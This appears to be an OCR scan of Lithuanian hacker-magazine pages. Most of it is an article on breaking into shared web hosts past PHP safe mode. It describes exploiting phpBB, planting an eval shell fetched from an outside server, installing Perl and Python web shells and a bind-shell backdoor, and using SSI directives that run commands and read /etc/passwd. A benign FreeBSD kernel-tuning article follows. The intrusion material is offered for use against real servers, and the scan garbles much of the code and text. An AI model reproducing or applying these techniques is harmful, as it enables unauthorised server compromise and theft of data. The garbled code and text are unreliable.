- priėjimo prie sisteminių bylų ir katalogų patikrinimas. 

3. Patogi navigacija po serverio failų sistemą su plačiomis 
galimybės: 

- bylų kopijavimas, šalinimas, parsiuntimas, peržiūra, reda- 
gavimas, išvalymas, imas; 

- pilna reikiamų bylų eilučių pakeitimo galimybė (pavyzdžiui, 
access.log); 

- katalogų kūrimas, šalinimas, archyvavimas; 

- galimybė bet kokią bylą išsiųsti į nurodytą elektroninio pa- 
što dėžutę. 

4. Bekdoro įdiegimas: 

- galimybė su perl/C užbindinti norimą jungtį; 

— connect-back bekdoro įdiegimas su peri/C. 

Išsamiau apie šį skriptą gali paskaityti adresu http://ru24- 
team.net, ten pat galima prisijungti prie NIX REMOTE WEB 
SHELL kūrimo. 
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Pakeliame geležinę uždangą 


VISOS STANDARTINĖS ĮSILAUŽIMO Į PRIE- 
ŠKAS SVETAINES SCHEMOS JAU SENAI 
NOMOS. NUODINGASIS NULIS, PHP-INC- 
UDE, SOL-INJECTION — TUO NENUSTE- 
NSI NET DARŽELINUKŲ. GAVĘ GALIMY- 
Ę NUTOLUSIAME SERVERYJE VYKDYTI KO- 
IANDAS, ĮSILAUŽĖLIAI SKUBA | JĮ PERSIUS- 
PATOGŲ PHP SHELLĄ, KURIŲ DABAR 
RIKURTA DAUGYBĖ — VIENAS UŽ KITĄ 
RAŽESNI IR RYŠKESNI. NESIGINČYSIU, 
WEB APLINKŲ PANAUDOJIMAS SUPAPRAS- 
NA TOLIMESNĮ GYVENIMĄ. TAČIAU KAR- 
AIS NUTINKA GANĖTINAI LIŪDNAS REIŠKI- 
IYS, KUOMET PHP SHELLAS NEVYKDO KO- 
MANDŲ, SERVERYJE TAIP PAT NEPAVYKS- 
TA ĮTRAUKTI (/INCLUDE) BYLAS, DĖL KO KY- 
LA DAUGYBĖ KLAIDŲ. TAI IR YRA JIS — 


£s So: 


o23z2B 
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NESTOVI VIETOJE. JIE IŠMOKO AI 
GŲ PHP REŽIMĄ. 


„PHP safe mode“ 
apribojimų apėjimų metodai 

[Jaunojo kario kursas] Visų pirma, kas gi yra tas PHP 
safe mode? Kaip parašyta dokumentacijoje — tai „ban- 
dymas išspręsti saugumo problemą“. Kalbant paprasta 
kalba, tai tam tikrų svarbių php interpretatoriaus direktyvų 
konfigūr nustatymų byloje, kuri turėtų sutrukdyti įsi- 
laužėliui patekti į sistemą arba jį atbaidyti. Tokių direktyvų 
pakankamai daug. Susipažinkime su kai kuriomis iš jų: 
* safe mode gid=1|0. Eilutė aktyvuoja bylos savininko 
ir vykdomo skripto savininko gid'ų sulyginimą, kurių ne- 
sutapimo atveju skriptui uždraudžiamas priėjimas prie 
bylos. Pavyzdžiui, jeigu tu pabandysi nuskaityti slaptažo- 


džių bylą readfile( /etc/passwd'), kuri priklauso vartotojui root, tai 
gausi pranešimą apie klaidą 
* open basedir=/katalogo/pavadinimas. Ganėtinai niekšiška di- 
rektyva :). Jeigu tavo skriptas bando nuskaityti bylą ne iš nuro: 


dyto katalogo (pavyzdžiui, su funkcijomis fopen() arba file()), tai 
bus išmesta klaida, pavyzdžiui, open basedir restriction in ef 
fect. Tiesa, galima pabandyti nuskaityti bylą vienu katalogu aukš: 
čiau — galbūt tuomet kas nors ir išeis. 

* safe mode exec dir=/katalogo/pavadinimas. Skriptas atsi 


sako vykdyti sisteminės programas, kurios yra už šio katalogo 
ribų. Iš to išplaukia, kad jeigu skriptas yra kataloge /usr/home, 
deep/ass, tai įvykdyti system(/bin/Is) nebus jokios galimybės. 
* disable functions= „funkcijos pavadinima Tai labai 
rektwa, kuri leidžia administratoriui atjungti tam tikra: 
Kaip tu jau tikriausiai numanai, į juodąjį sąrašą paprastai į paten) ka 
potencialiai pavojingos system(), exec(), passthru() ir popent). Tie- 
są, yra viena maža gudrybė, kuri vis dėlto leidžia sistemoje vykdyti 
šias komandas, tačiau ją mes aptarsime šiek tiek vėliau, Derėtų 
pastebėti, kad disable functions išsprendė problemą, kurios iki 
galo neišspręsdavo ankstesnė direktyva: įsilaužėlis dabar visiškai 
neturi galimybės vykdyti sisteminių komandų. Kaip tu tikriausiai 
supranti, tokiomis salygomis web shellas neveiks ir vykdyti koman. 
dų su įprastiniu system($ GET/'cmd') nepavyks. 

Štai pagrindinės problemos, su kuriomis tat susidurti dir 
bant mašinoje, kurioje PHP veikia apsaugotame režime. Norint 
gauti daugiau informacijos apie PHP direktyvas ir nust 

tau derėtų pasinaudoti oficialia dokumentacija, kurią 
svetainėje www.php.net. 

O mes tuo laiku pabandysime išmokti apeiti bent jau dalį šių 
griežtų apribojimų. Be abejo. remdamiesi realaus hostingo pa 
vyzdžiu. 


[Nepakeičiama praktika] Savo testams aš pasirinkau ne šiaip 
sau įprastinį ISR, o vieną iš labiausiai gerbiamų ir žinomų kompa- 
nijų, kurioje veikia daugybė serverių ir dirba galinga palaikymo 
tamyba. Todėl viskas, ką aš toliau aprašysiu, teisinga didžiajai 
likusių hosterių daliai. Taip pat derėtų pastebėti, kad eksperi- 
mentus aš atlikinėjau ir užsienio hostinguose, todė| visus šiame 
straipsnyje aprašytus metodus galima sėkmingai panaudoti ir te- 
nai. Bet neužbėkime įvykiams už akių 

Šiaip jau visa ši istorija prasidėjo prieš porą mėnesių, kuomet 
aš užsimaniau nulaužti būtent tos pačios hostingo kompanijos, 
apie kurią greitai bus kalbama, serverį. Po neilgų pažeidžiamų 
php skriptų paieškų aš susidūriau su banaliu neužiopytu ir visų 
mėgiamu phpBB 2.0.11. Parsisiuntęs ir paleidęs eksploitą 
(http://unixforge.org/=sshxlx/phpbb.exe), kuris pagal idėją su 
teikia teisę atakuojamoje sistemoje įvykdyti laisvai pasirinktą 
php kodą, aš vietoje atsakymo gavau štai ka: 


Kip;/lakin.fokjunet/forunVadmin/admin. stylos phy?mode = ad 


tmpėnigga = phpin 
b66571C909c10651464 


Tačiau, buvo vienas „bet“. Vieto- 
je laukto phpinfo() išvedimo man 
buvo pateikta klaida: Warning: 
phpinto() has been disabled for 
security reasons. Kaip šiek tiek vė- 
liau paaiškėjo, vykdyti sisteminės 
funkcijas taip pat buvo uždraus- 
ta, todėl situacija buvo išties ne- 
maloni. ką čia ir besakyti. Tačiau 
būtent ji privertė mane ieškoti 
standartinių būdų pakaitalo ben- 
drauti su serveriu ne per systemi). 
Taigi išsiaiškinkime, ką mes turi- 
me: mes negalime vykdyti siste- 
minių komandų, Iš ko išplaukia, 
kad negalime tyrinėti ir failų sis- 
temos, į atakuojamą serverį per- 
siųsti savo bylų bei peržiūrinėti jų 
turinio. Tačiau mes vis dar gali- 
me kodą vykdyti funkcijoje evali), 
kuri interpretuoja php koda, t.y. 
dabar mums reikia visas reikia- 
mas bendravimo su serveriu funk- 
cijas parašyti patiems ir perduoti 
jas vykdyti funkcijai eva/(). Visų pir- 
ma, būtina į nutolusią mašiną įra- 
šyti eval shello web formą, kad 
po to būtų galima jam apdoroji- 
mui perduoti mūsų php kodą. Tam 
per kintamąjį nigga perduodame 
štai tokį skriptą: 


PHP 4.3vosioje yra 


Išsamią dok 
ciją apie PHP 
derėtų Ikyti 90 ranka: 
ww php.netdownlo 
atiddocs pho 

Laba! gero dokumen: 
tacija apie visas dokt) 
Mmentuojas php Aure! 
Jos: viet Rack 
books/b0- 
oks.ohp?a 

Saugus programas! 
mas su PMP 
Vraiavob aek.nbo 
oxs/bo 
oks.php?go-36 


Bylos įrašymas 
"ohp 
Sfilen= "httpy//unixforge.org/- sshx/X/eval shell.php.bt"; 
Sfile new "sval shell plp"; 
Stato = implode(“", ile(šfilei)); 
Šip = fopen(štle. new, *V), 
fputs(Sfp, Sdata); 
idose(Sfp) 
1 


Manau, jog čia komentarų nereikia. Gauname bylos deskripto- 
rių (handle) įrašymo režime, o į $file new įrašome mūsų bylos 
turinį. Norėčiau pastebėti, kad čia galima rašyti tiek lokalioje 
mašinoje saugomas, tiek ir nutolusias bylas, jeigu tik funkcijai 
fopeni) nėra blokuojamas soketų atidarymas. 

Dabar į einamą katalogą bus įrašyta web forma, per kurią mes 
toliau vykdysime savo laisvai pasirinktą kodą. Tiesą sakant, mes 
turime kažką panašaus į php shellą, tačiau nuo normalaus shello 
Jis skirsis tuo, kad mes navigacijai po FS ir darbui su bylomis 
naudosime savo funkcijas, kas šiek tiek nepatogu ir iš pradžių 
neiprasta. 


Metas rašyti skriptus. Štai ko mums reikia pirmiausiai: 

1, Navigacijos po serverio failų sistemą 

2, Bylų skaitymo 

3. Bylų įrašymo/užkrovimo 

Ko gero, pradžiai užteks. Važiuojam! Pats paprasčiausias mūsų 


kolekcijos skriptas bus primityvus bylų peržiūros įrankis: 


< ?phį p 
echo alžbi(htmlspacalchas(inglode,", Ala( Hlenane )); 
? 


Čia filename, kaip ir reikėjo tikėtis, yra nuskaitomos bylos pa- 
vadinimas. Beje, norėčiau pasakyti, kad vienas ir tas pačias 
užduotis galima spręsti skirtingais būdais. Niekas tau netrukdo 
bylą atidaryti su funkcijomis include(), reguire!), filel). o iš stan- 
dartinio fopen() deskriptoriaus skaityti su fread(), fgets() arba 
fgetc(). Taip net jeigu viena iš šių funkcijų atsidurs juodame 
uždraustų funkcijų saraše, greičiausiai bus galima surasti vei- 
kiantį analogą. Todėl jeigu kokia nors funkcija neveiks, derėtų 
pasinaudoti dokumentacija ir pereiti per visą see also sąrašą. 
O dabar, norėdami nuskaityti, pavyzdžiui, bylą /etc/hosts. ke- 
liaujam į ww. fakin.fakju.net/path/to/eval shell.pho ir į forma 
įterpiame mūsų kodą, tačiau be php tagų (<? ir 7>), po ko 
bylos turinys turėtų būti sėkmingai atvaizduotas. Pakeliui gali- 
ma nustatyti ir serveryje veikiančią operacinę sistemą — tam 
Skirta speciali funkcija php uname. Tu viską supratai teisingai, 
taip bus galima greitai sužinoti, ar serveryje įdiegta *BSD ir ilgai 
nesvarsčius liautis bandžius laužti toliau :). Pats laikas pasirū- 
pinti disko naršymo galimybe. Skriptas pakankamai primityvus: 


Kamlogų skaitymas 
<?php 

Sdiro —/home;// nuskaitomas katalogos 

Sob=opendi(*Šdir");// atidaroma katalogą ir gauname deskiptaių (handle) 
while(Stilen - readdir(Sab))(// nuskaitome katalogo turini 
Sdire2 — reolpalh(“Šdire"); 
i (is di(“Sdire2/Stilen“) = 
print “Šd Slilon <b> <b> 


closedir(Sob]; 
2 


TRUE )4Sd="[Dif",) oe (St 
*. W/ spausdiname vii 


ML) 


Ką tik mes sukūrėme /bin/Is pakaitalą, kuris, tiesą sakant, kol 
kas dar šiek tiek kreivokas. Čia galima įdiegti daugybę kitų gali- 
mybių, pavyzdžiui, parodyti paskutinio kreipimosi į bylą laika: 
date(*F d Y Hri:s.", filemtime(“Sdire/$filen")) 


Skriptą taip pat galima parašyti ir kitaip, panaudojant dir klasės 
savybes. Katalogo turinys nuskaitomas štai taip: Sentry = $dir- 
>read(). Norint sužinoti, ar tai yra byla, ar katalogas, naudoja- 
ija is dir(). Su is writable() patikriname, ar galima ra- 

Šiaip jau išeities tekstus gali rasti čia: No) J 
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bar tam, kad iš savo kompiuterio perkeltum bylą į serverį. mes 
parašysime web formą. Skripto kodo aš čia nepateiksiu, nes tu 
ji nesunkiai rasi adresu http://unixforge.org/-sshY/X/uplo 
ad.php.txt. Tik norėčiau pastebėti, kad jį reikia užkrauti kaip 
atskirą php bylą, o ne vykdyti su eval. Aš jau minėjau, kad vieną 
problemą galima išspręsti skirtingais būdais, todėl jeigu tų iš 
ei s gerai moki php, tuomet sugebėsi daugelį užduočių iš: 
spręsti savaip. Būtent todė! tau tikrai praverstų bent jau php 
kalbos pagrindai 


[Nuodingoji alternatyva] O dabar įsivaizduok situaciją, kuomet 
tolimesni veiksmai serveryje panaudojant PHP nėra įmanomi: ad- 
ministratorius skrupulingai sukonfigūravo saugų režimą, palikda- 
mas minimalias galimybes. Tačiau išeitis kaip visada yra. Realybė- 
je dažnokai įmanoma išnaudoti altermatyvius interpretatorius, pa- 
1žiui, Perl. 10096 tikimybė, kad jis yra įdiegta: temoje ir gali 
būti, kad Apache bus sukonfigūruotas /cgi-bin/ kataloge vykdyti „pl 
ir .cgi skriptus. Aš norėjau pasakyti, kad jeigu PHP interpretatoriaus 
galimybės per daug aplpjaustytos, mes darome štai ką: 

1. -bin/ užkrauname perlinį web shellą (pasinaudodami 
mūsų skriptais upload.php arba files.php). 

2. Nustatome Perl interpretatoriaus buvimo vietą (vizualiai, pa- 
sinaudodami dirphp. arba su funkcija file. exists('/usr/bin/perl"), 
i grąžins true, jeigu tokia byla egzistuoja). 

3. Web shelle pakeičiam kelią iki Perl, su chmod(nws.pl,0755) 
suteikiam jam atitinkamas priėjimo teises 

4. Naršyklėje paleidžiame shellą ir, jeigu iškils problemų, 
žiūrim ankstesnius etapus, kad sužinotume, kuriame 
buvo padaryta klaida, 

Vietoje per! shello galiu tau rekomenduoti cgi-telnet.pl (http:// 
unixforge.org/—sshx/x/cgi-telnet.tar.gz) ir žymios komandos RST 
skriptą (57pws.l (http://rst.vaid.ru/download/r57pws.txt). In: 
ternete galima rasti daugybe su perl parašytų tokio tipo įrankių, 
todėl su pasirinkimu problemų iškilti neturėtų. 

O dabar pakalbėkime apie egzotiškesnį įsilaužimo metodą. Da- 
bar vis labiau populiaresnė darosi kalba Python (tokia didelė ir 
stora gyvatė). Mes apie šią kalbą jau ne kartą rašėme, todėl tu 
turėtumei žinoti, kad praktiškai kiekviename *nix serveryje gali- 
ma surasti pitono interpretatorių (paprastai /usr/bin/python ar- 
ba /usr/local/bin/python). Iš tikrųjų, pasirodo, labai patogu nau- 
a E TT 2 


doti būtent python shellus. Aš tau papasakosiu apie populiarią 
programą cgi-python.py. Šio web shello veikimo principas toks 
pat, kaip ir bet kurio kito skripto. Rei rodyti teisingą kelią 
iki kalbos interpretatoriaus, perkelti bylą į /ogi-bin/ ir nepamiršti 
pakoreguoti jo teisių su chmod +x. Po to shellas paruoštas 
darbui ir laukia tavo komandų. Be abejo, shellas yra labai gerai 
tačiau bash aplinka, pribindinta prie tam tikros jungties — dar 
geriau. Būtent todėl mūsų arsenalas pasipildys wh bindshell.py 


+6 
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Mele 


ae to egi-shell.py 
a Python CGI 


p Kazys 


Enter Command 


Pitoryr 


[Python bindsheli] 

Iš karto po šnekų apie pitono shellą ir backdoorą noriu tau 
papasakoti apie dar vieną nuostabų su python sukurtą įran- 
kį. Jis labai įdomus, ir vieno išmanančio žmogaus žodžiais 
tariant, savotiškai unikalus. Susipažink, pats pyWebShell. Kas 
gi jame tokio neįprasto? Tai ne šiaip sau eilinis web shellas, 
tai bekdoras su įmontuotomis web serverio galimybėmis. 
Tai reiškia, kad tu jį paleidi iš komandinės eilutės, kaip įprastinį 
bekdorą, po to per jungtį pagal nutylėjimą paleidi mažą http 
serverį. Po to su naršykle tu užeini adresu http://hackedma- 
chine.com:8003 ir, o stebukle, prieš mus — patogi web 
aplinka (kaip web shelle), kurią labai lengva naudoti! 

> CONFIG skyrelyje galima pakeisti jungtį (PORT=8003) 
ir skripto namų katalogą (+homedir="/tmp"). Jeigu tu iš- 
manai python, tuomet gali pats susigaudyti šio įrankio išei- 
ties tekstuose ir surasti įmontuota funkciją, kuri skirta ftp 
perrinkimui — ftp brut(). Šį nuostabų agregatą gali rasti ad- 
resu http://unixforge.org/—sshx/x/http.py. Išskirtinis daikčiu- 
kas, skirtas specialiai tau :). 


Ekskiluzyvinis bind-shellas 


Niani 
FreeBSD shiteomp default 5.3 RELEASE FreeBSD £.3-RELFASK 0: Fri Nov 5 04:19:18 
L VTG 2004 roda rius «sc uttalo ed: Ust" ur ys GENERIC 960 


Jun 26 09:46. 
un 26 0924 


un 20 1006 (10. 
Jun 26 10:14 M0.04.9) 
Jun 26 10:56 (10.00.0) 


total 14989 
rar ara 
Ara ara 


wir Žrost wheel 251 Jan 21 15:46 „profile 


Naudojam SSI 


[SSI] 

Aš negalėjau nepaminėti SSI (Server Side Includes). Tai 
„shtml ir „shtm tipo bylose naudojamos direktyvos, kurias 
be jokių pašalinių interpretatorių vykdo pats Apache web 
serveris. Su SSI galima išdarinėti pakankamai įdomius da- 
lykėlius, pradedant bylų įtraukimu ir baigiant sisteminių ko- 
mandų vykdymu. Taigi SSI įrašomas tiesiog į web puslapio 
kūną (kaip, pavyzdžiui, PHP kodas) štai tokiu pavidalu: 


<!-- direktyva = "reikšmė"—>. 


Savaime suprantama, užėjęs į svetainę, tu matai ne „<!-—- 
* ir „—>", 0 įvykdymo rezultatą. Pavyzdžiui, direktyva <! 
+include= "right menu.html"—> į puslapio html kodą 
įtrauks tavo nurodytą meniu. Tiesa, SSI galima naudoti ir 
savo klastingais tikslais. Pavyzdžiui, direktyva <!--4žinclude 
file="/etc/passwd"—> į puslapio kūną įtrauks sisteminės 
bylos su vartotojų įrašais turinį (tai veikia ne visada, todėl 
jeigu direktyvoje nurodyta byla nėra Įtraukta, tai dar toli gra- 
žu nereiškia, kad šiuo atveju atjungtas SSI palaikymas). Sal- 
džiausias yra tas faktas, kad mes web serverio vardu galime 
Vykdyti sistemines komandas: <!-—+žexec cmd=" uname — 
a; Id“—> mums išves kur kas labiau pažįstamus rezultatus 
:). Analogiškai bylų įtraukimas bei komandos vykdomi ir lan- 
ginėse: <!--+include file="c:|admins|passwd.bt"—> ir 
<!-->exec cmd="C:|Windows|system32|cmd.exe |dir 
C4"—>. Žodžiu, kaip pats matai, panaudoti SSI savais klas- 
tingais tikslais ne taip jau sudėtinga. Pakanka sukurti štai 
tokio turinio bylą ir ją perkelti į atakuojamą serverį: 


<hinl> 
<body> 
<!—žerec amd="Is -lo /cat /et/possw"—> 
</body> 
</Atnl> 


skriptu. Tai valdantis pilnavertiškas su pitonu parašytas bekdo- 
ras, kuri sukūrė hakeris SerG (už ką jam didelė pagarba). Ši 
programa veikia taip pat, kaip ir visi kiti įprastiniai bekdorai. 
komandinėje eilutėje ji paleidžiama taip: 


S python wi bindshell.py [port] [password] 


Jeigu skriptas bus paleistas be parametrų, tai tuomet isigalioja 
standartiniai nustatymai (Port=50001 password = web-hack'). 
+ Default + skyrelyje gali pakeisti bet kurį parametrą: Jungti, 
slaptažodį, komandos įvedimo kvietimą, shello išjungimo komandą 
ir komandas, kurios vykdomos shello krovimo metu. Atkreipk dė. 
mesį, kad slaptažodis apsaugomas su md5, todėl prieš keisda- 
mas nurodytą pagal nutylėjimą konfigūracijos byloje. sugeneruok 
savo naujo slaptažodžio hešą. Bekdoro autorius rekomenduoja 
tai daryti taip: 


$ python (“import md5;x= md5.new('your password');print x.hexdigest(|" 


Galima taip pat pabandyti užkrauti bylą per FTP ir pamėginti ją 
paleisti per www. Man taip yra pavykę net kelis kartus atidaryti 
bekdorą per tam tikrą jungtį. Prieš paleisdamas pitono skriptus 
į mūšį, būtinai ištestuok juos lokalioje mašinoje arba draugiš- 
kame serveryje, kad būtum tikras, jog jis veikia. 


[The end?] Taigi metas išvadoms. Šiandien išsiaiškinome, kaip 
veikti su aktyvuotu php safe mode ir kokiu keliu eiti, kad apel- 
tum šio režimo sukuriamus apribojimus. Straipsnyje aš nepa- 
teikiau visų php skriptų — čia yra tik bendriausi ir kompaktiš- 
klausi pavyzdžiai. Juos papildyti ir sukurti naujų galėsi tu pats, 
jeigu tik norėsi. Baigdamas pasakysiu, kad eksperimentuoti ir 
———>- įsilaužinėti net ir pa- 
> Žintiniais tikslais never- 
ta, nes taip tu gali su- 
sipažinti ir su piktais 
dėdulėmis iš vidaus 
organu, kurių veiduo- 
se puikuosis šypsenos 
:). Sėkmės, nejkliūk! 


Reikia gauti bazės slaptažodį? Tai sai nesunku! 


Pei Ta T 


= a 


Eilnis r57 sukurtas shellas, šį kartą su per! 
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Froindšaftas su velniuku 


NIEKAM NE PASLAPTIS, KAD BET KURIOS 
OPERACINĖS SISTEMOS NUSTATYMAMS 
PAGAL NUTYLĖJIMĄ IKI TOBULYBĖS GANA 
OLI. DĖL TO TIEMS, KAS NUOL 

SAVO LAIKĄ IR JEGAS KRUOPSCIAM KON- 
FIGURAVIMUI, NORI NENORI TENKA PATIR- 
I TAM TIKRĄ DISKOMFORTĄ SU KONKRE- 
TIEMS POREIKIAMS NEPRITAIKYTA SISTE- 
A. O STAI TIKRAS UNIKSOIDAS (KOKS TU, 
BE JOKIOS ABEJONES, IR ESI) SU TUO NE- 
SITAIKSTYS IR PRISIKAS IKI GILIAI PASLĖP- 
Ų OPCIJŲ, NOREDAMAS PADIDINTI MEGIA- 
MOS OPERACINĖS SISTEMOS SAUGUMĄ, 
PATIKIMUMĄ IR GREITAVEIKĄ. TACIAU TO- 
KIEMS RYZTINGIEMS VEIKSMAMS GALI 
PRIREIKTI VADOVO, KURIS IR PATEIKIAMAS 
TAVO DĖMESIUI. MES PAGRINDE KALBĖSI- 
ME APIE DARBASTALIO KONFIGŪRAVIMĄ, 
O SERVERIO ATVEJU BUS ISSAKOMOS SPE- 
CIALIOS PASTABOS. PRADĖSIM. 


Subtilus „FreeBSD“ 


konfigūravimas ir optimizavimas 
ĮViskam vadovauja branduolys] Branduolys yra operacinės sis 
temos smegenų centras, aprėpiantis viską: virtualią atmintį, pro- 
cesus, signalus, semaforus, kanalus, tinklo susijungimus, failų 
sistemas ir, be abejo, daugybę įrenginių tvarkyklių. Kūrėjai įtrau 
kia kuo daugiau įrenginių jungčių, kad operacinė sistem. 
būti pritaikyta bet kokiai aparatinei aplinkai. Natūralu, je 
toks variantas netinka: mes iš branduolio pašalinsime visas 
mums nereikalingas opcijas, modulius, tvarkykles, kas mums 
leis sumažinti branduolio dydį ir. žinomą, jo užimamos atmin- 
ties kiekį. Be to, branduolyje pagal nutylėjimą gal 
reikalingų įrenginių/protokolų palaikymo, todėl be perkon 
vimo čia neapsieisi. 


[Branduolio konfigūravimas ir perkompiliavimas| Branduo 
lys kompiliuojamas iš išeities tekstų, kurie yra kataloge /usr/src: 
sys (jeigu išeities tekstų nėra, pasinaudok kompaktiniu disku su 
distributyvu ir įrankiu sysinstal! arba reikiama versija gauk su 
cvs/cvsup). Dabar pereiname į katalogą su šablonais ir padaro- 
me konfigūracijos pagal nutylėjimą bylos kopiją: 


st/src/sys/ arch —$'/conf 
ERIC AYKERNEL 


Išsiaiškinti visų opcijų viename straipsnyje neimanoma, todėl 
pakalbėsime tik apie įdomiausias iš jų. Branduolio konfigūraci 
jos byla sąlyginai suskaidyta į blokus, todėl ir opcijas aptarinėsi- 
me blokais. 


(pu I586 


CPU 
cpu 1686 CPU 
ident GENERIC 
nokusers 32 


Pirmoji eilutė nurodo naudojamos mašinos architektūra. Toli- 
mesnės keturios leidžia pasirinkti konkretų procesoriaus tipą 
Paliekame tik eilutę su mūsų procesoriaus tipu (/I686 CPU — 
Pentium Pro Ir aukščiau). Visas likusias arba ųžkomentuojame, 
arba pašaliname. Parametro ident reikšmė nurodo naujojo bran- 
duolio žymę (ident ir konfigo pavadinimas turi būti vienodi) 

Ypatingai įdomus raktinis žodis maxusers. Sprendžiant iš pava- 
dinimo, galima numanyti, kad šis parametras apriboja maksi 
malų vartotojų skaičių, tačiau su juo nurodomi kai kurių vidinių 
branduolio lentelių parametrai: ribinis atidarytų bylų ir paleistų 
procesų, tinklo buferių ir kitų dalykų skaičius (be abejo, tai turi 
netiesioginės įtakos ir maksimaliam sistemos vartotojų skai- 
čiui). Keisti šią opciją reikia tik persipildžius branduolio lente- 
lėms arba laimingiems apkrauto serverio prižiūrėtojams. Failų 
deskriptorių kiekį, kuris bus prieinamas pakeitus šį parametrą, 
galima apskaičiuoti pagal formulę (20 + 16 * maxusers). Jeigu 
signalų apie persipildymą nėra, maxusers geriau nekeisti (o lė 
tesnėse mašinose galima net pabandyti ją sumažinti, kad at- 
laisvintum šiek tiek atminties). Taip pat galima maxusers pri 
skirti lygiu O, tuomet sistema automatiškai parinks reikiama 


reikšmę. 
Direktyva makeoptions DEBUG= g leidžia kompiliavimo metu į 
branduolį įjungti derinimo informaciją. Ši opcija priskiriama ypač 
nepageidaujamų kategorijai, kadangi padidina branduolio dydį 
Ir sumažina jo greitaveiką. Tiesa, ši direktyva ypač naudinga 
branduolio hakeriams, kurie studijuoja branduolio dump'us. 


GPL MAIH EMULATE 
MATH EMULATE 


Options 
Options 


Išvardintos opcijos aktyvuoja matematinio koprocesoriaus emu- 
liaciją (jų reikia tik tuomet, jeigu tavo mašinoje yra 80486SX 
arba senesnis procesorius). 

Judam toliau. Kitose dviejose opcijose pirmasis parametras yra 
būtinas (BSD ir be tinklo?), o IPv6 galimybę ne nuodėmė ir 
Išmesti: 


ptions | INEI 
pilons INETo 


Peroisime prie tailų sistemų: 
ptions FS 

Options UFS DIRHASH 
options SOFTUPDATES 


Pirmoji eilutė fryškės failų sistema, be kurios dirbti gana 
sudėtinga. Kita eilutė aktyvuoja funkcionalumą, kuris padidina 
darbo su dideliais katalogais greitį (tuo pačiu tam papildomai 
reikia operatyvinės atminties). Trečiasis parametras į branduolį 
įjungia SoftUpdates mechanizmą, leidžiantį apčiuopiamai padi- 
dinti rašymo į diską greitį. Tiesa, vien šios opcijos branduolyje 
nepakanka, SoftUpdates palaikymą taip pat būtina užtikrinti kon- 
kretiems diskams (žvilgtelėk į komandos mount išvedamą intor- 
maciją). Naujoms failų sistemoms tai daroma su komanda newfs 
-U /devlad*s+. o jau egzistuojančioms — umount -Af /; tu- 
nefs -n enable /dev/adž's**. Dabar apie ne pirmines failų sis- 
temas: 


BI2S 
NES 

MD ROOT 
NES 

NFS ROOT 
NSDOSFS 


dylionį 
options 
gytions 
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Su programa sysinstall įdiėgiam branduolio Išeties tekstus 


(09660 
(09660 ROOT 
PROCES 


options 
options 
options 


Visi šie įrašai reiškia suderinamumą su atitinkamomis failų sis- 
temomis (ext2/ext3, memory disks, nfs, fat16/fat32, is09660, 
proc) bei tai, kad bus galima krautis iš particijų su tokiomis FS. 
Šias opcijas gali naudoti savo nuožiūra. 

Čia derėtų pastebėti, kad FreeBSD 5.x ir naujesnės sistemos 
atveju praktiškai bet koks branduolio funkcionalumas realizuo: 
jamas su atitinkamu /boot/kerne! kataloge saugomu moduliu, 
todėl iš branduolio daug ką galima išmesti, o po to modulius 
krauti arba prireikus, arba sistemos krovimosi metu su /boot 
Ioader.conf. 


options (OMPAT 43 // Sudatinamumas su 4.385D () 

plons | COMPAT  FREEBSD4 | // Suderinamumas su IresBSD 4.x (gonitinui pag 
dalina) 

apions SCSI DELAY = 15000 | // Užlaikynas pries SCSI renginiu upikimų (ilsekun 
dėmi) 

options KIRACE | // ktrace palaikymas 

options | SYSVSHA 

options | SYSVISG 

options | SYSVSEM 


Parametrai, prasidedantys raidėmis SYSV, reiškia dalinamos at- 
minties, semaforų ir pranešimų palaikymą System V stiliumi. To 
reikia tik tam tikroms programoms, todėl iš esmės galima ap- 
seiti ir be šių opcijų. Tiesa, nepamiršk iš anksto pažiūrėti į do- 
kumentaciją dėl tų pačių programų (pavyzdžiui, Xorg X serveriui 
reikia SYSV opcijų). 

Ktrace aktyvuoja branduolio atliekamą procesų treisinimo ir lo- 
ginimo mechanizmą. Loginimo byla — ktrace.out (viso to realiai 
reikia tik hakeriams ir programuotojams). 

0 dabar pakalbėsime apie serveriui aktualius parametrus: 


IMP BANDLIM 
TCP DROP SYNFIN 
RANDOM IP ID 
TCP RESTRIO RST 


options 
options 
options 
Ogiions 


ICMP BANDLIM leidžia apriboti ICMP atsakymų skaičių. Antra- 
sis parametras nurodo atmetinėti paketus su neleistinomis TCP 
paketo vėliavėlių kombinacijomis (tiesą sakant. serveryje to da- 
ryti nerekomenduojama. kadangi prarandama galimybė panau- 
doti RFC 1644 praplėtimus, nors kliento kompiuteriui tai nėra 
kritiška); trečiasis IP paketo ID lauke generuoja atsitiktinę reikš- 
mę vietoje to, kad kiekvieną kartą šio lauko reikšmę didintų 
vienetu (trukdo atlikti idle skenavima); ketvirtasis blokuoja pa- 
ketus su TCP antraštėje nurodyta vien tik RST veliavėle (apsau- 
go nuo kai kurių DoS atakų tipų). Su sysct! galima subtiliau 
sukonfigūruoti tinklo apsaugą, tačiau apie tai pašnekėsime šiek 
tiek vėliau. Būk atidus — FreeBSD 5-STABLE ir naujesnėse 
sistemose šios opcijos iškeltos į atitinkamus sysct! kintamuo- 
sius, todėl tokiose sistemose jos negali būti kompiliuojamos 
kaip branduolio opcijos. 

Toliau eina keletas direktyvų, susijusiu su multiprocesorinio bran- 
duolio kompiliavimu (taip pat skirta serveriams), pagrindinė ku- 
rių yra SMP Likusią bylos dalį užima Ilgas Įrenginių sąrašas. 
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Tolimesnio redagavimo principas labai paprastas: visas su tau 
nereikalingais įrenginiais susijusias eilutes galima be baimės 
užkomentuoti/pašalinti. Tačiau čia yra tam tikrų išimčių: pavyz- 
džiui, negalima pašalinti eilutės „device isa“, net jeigu tavo kom- 
piuteryje nėra nė vieno ISA lizdo, taip pat pašalinti SCSI galimy- 
bės, jeigu yra IDE CDROM arba USB atminties raktas. 


aptions DD 
options XSERVER 
device bpf 


Pirmoji Gpcija — tai branduolinio derintuvo įjungimas (nereika- 
lingas), antroji vt konsolėje (vtO) įjungia X-serverį (abejotina), 0 
trečioji — tai Berklio paketų filtro pseudojrenginys (būtinas ser- 
veriams, filruojantiems paketus, turintiems IDS ir tais atvejais, 
kuomet tu pats aktyviai stebi/snifini tinklą). 

Toliau pateiksiu keletą įdomių opcijų iš LINT konfigūracinės by- 
los. 


options “CHILD MAX= 40" 


Šis parametras nurodo maksimalų sukurtų antrinių procesų kiekį, 
kuriuos gali sukurti pirminis. Kai kuriais atvejais šį parametrą 
gali tekti padidinti. 


aplions "OPEN MAX= 64“ 


Maksimalus bylų skaičius, kurias procesas gali atidaryti. Geriau 
šio parametro reikšmę iš karto padidinti iki 128, net jeigu kon- 
